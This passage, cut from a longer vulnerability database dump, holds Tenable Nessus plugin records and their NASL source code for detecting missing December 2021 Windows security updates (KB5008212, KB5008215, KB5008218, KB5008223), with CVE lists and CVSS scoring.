(!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008206])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-19T15:09:05", "description": "The remote Windows host is missing security update 5008212.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43237, CVE-2021-43238, CVE-2021-43239, CVE-2021-43240, CVE-2021-43247, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236, CVE-2021-43244)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-43219, CVE-2021-43228, CVE-2021-43246)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008212: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 / Windows 10 Version 21H2 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527", "CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43244", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2023-06-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008212.NASL", "href": "https://www.tenable.com/plugins/nessus/156065", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156065);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/17\");\n\n script_cve_id(\n \"CVE-2021-34527\",\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43219\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43228\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43237\",\n \"CVE-2021-43238\",\n \"CVE-2021-43239\",\n \"CVE-2021-43240\",\n \"CVE-2021-43244\",\n \"CVE-2021-43246\",\n \"CVE-2021-43247\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008212\");\n script_xref(name:\"MSFT\", value:\"MS21-5008212\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5008212: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 / Windows 10 Version 21H2 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008212.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43237, CVE-2021-43238,\n CVE-2021-43239, CVE-2021-43240, CVE-2021-43247,\n CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236, CVE-2021-43244)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-43219,\n CVE-2021-43228, CVE-2021-43246)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008212\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5008212.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-12\";\nvar kbs = make_list('5008212');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19041',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212])\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212]) \n\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19044',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:25", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43237, CVE-2021-43238, CVE-2021-43239, CVE-2021-43240, CVE-2021-43247, CVE-2021-43248, CVE-2021-43880, CVE-2021-43883, CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-43219, CVE-2021-43228)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008215: Windows 11 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008215.NASL", "href": "https://www.tenable.com/plugins/nessus/156068", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156068);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43219\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43228\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43237\",\n \"CVE-2021-43238\",\n \"CVE-2021-43239\",\n \"CVE-2021-43240\",\n \"CVE-2021-43246\",\n \"CVE-2021-43247\",\n \"CVE-2021-43248\",\n \"CVE-2021-43880\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008215\");\n script_xref(name:\"MSFT\", value:\"MS21-5008215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008215: Windows 11 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43237, CVE-2021-43238,\n CVE-2021-43239, CVE-2021-43240, CVE-2021-43247,\n CVE-2021-43248, CVE-2021-43880, CVE-2021-43883,\n CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-43219,\n CVE-2021-43228)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43217,\n CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008215\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5008215 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008215');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:22000,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008215])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:35", "description": "The Windows 10 1809 / Windows Server 2019 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43237, CVE-2021-43238, CVE-2021-43239, CVE-2021-43240, CVE-2021-43247, CVE-2021-43248, CVE-2021-43880, CVE-2021-43883, CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-43219, CVE-2021-43228)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008218: Windows 10 version 1809 / Windows Server 2019 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43244", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008218.NASL", "href": "https://www.tenable.com/plugins/nessus/156071", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156071);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43219\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43228\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43244\",\n \"CVE-2021-43246\",\n \"CVE-2021-43247\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008218\");\n script_xref(name:\"MSFT\", value:\"MS21-5008218\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008218: Windows 10 version 1809 / Windows Server 2019 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 10 1809 / Windows Server 2019 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 10 1809 / Windows Server 2019 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43237, CVE-2021-43238,\n CVE-2021-43239, CVE-2021-43240, CVE-2021-43247,\n CVE-2021-43248, CVE-2021-43880, CVE-2021-43883,\n CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-43219,\n CVE-2021-43228)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43217,\n CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008218\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5008218 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008218');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:17763,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008218])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:16", "description": "The Windows Server 2022 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43237, CVE-2021-43238, CVE-2021-43239, CVE-2021-43240, CVE-2021-43247, CVE-2021-43248, CVE-2021-43880, CVE-2021-43883, CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-43219, CVE-2021-43228)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008223: Windows Server 2022 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43244", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008223.NASL", "href": "https://www.tenable.com/plugins/nessus/156066", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156066);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43219\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43228\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43237\",\n \"CVE-2021-43238\",\n \"CVE-2021-43239\",\n \"CVE-2021-43240\",\n \"CVE-2021-43244\",\n \"CVE-2021-43246\",\n \"CVE-2021-43247\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008223\");\n script_xref(name:\"MSFT\", value:\"MS21-5008223\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008223: Windows Server 2022 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows Server 2022 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Server 2022 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43237, CVE-2021-43238,\n CVE-2021-43239, CVE-2021-43240, 